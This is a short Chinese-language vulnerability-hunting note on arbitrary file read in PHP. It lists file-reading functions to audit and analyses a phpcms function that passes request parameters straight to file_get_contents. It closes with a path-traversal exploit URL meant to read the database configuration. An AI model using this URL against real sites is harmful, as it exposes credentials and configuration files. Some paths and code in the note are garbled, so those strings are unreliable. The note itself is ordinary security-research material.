概述
- 部分程序在下载或者读取显示文件的时候,读取文件的参数filename直接在请求里面传递,后台程序获取到这个文件路径后直接读取返回
挖洞经验
- 文件读取的漏洞寻找起来比较容易一种方式是可以先黑盒测试功能点对应的文件,再去读文件,这样找起来比较快。
- 另一种方式就是搜索文件读取的函数,看看有没有直接或者间接控制的变量。文件读取函数如下:
file_get_contents()
highlight_file()
fopen()
readfile()
fread()
fgetss()
fgets()
parse_ini_file()
show_source()
file() - 除了这些正常的读取文件的函数之外,另外一些其他功能的函数也一样可以读取文件,
- 比如文件的函数之外,另外一些其他函数也一样可以读取文件,如文件包含函数 include PHP输入输出流 php://filter来读取文件
phpcms任意文件读取分析
代码如下:
public function public_get_suggest_keyword(){
$url=$GET['url'].'&q='.$GET['q'];
$res=@file_get_contents($url);
if(CHARSET != 'gbk'){
$res=iconv('gbk',CHARSET,$res);
}
echo $res;
}
- 这里可以看到该函数直接从GET参数里面获取要读取的url,然后使用file_get_contens函数来读取内容,
- 不过这里要说一点,如果直接提交?url=&q=1.php ,我们打印出来的url变量可以看到值为" &q=1.php",带到函数里面则是file_get_contents(" &q=1.php"),这样就读不到当前文件
- 需要 ?url=&q=…/…/1.php 这样多加两个“ …/”,吧“&q=” 当成目录来跳过,最终这个漏洞读取数据库配置文件的exp为:
- /index.php/phpcmsv9gbk//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=…/…/phpssp_server/caches/configs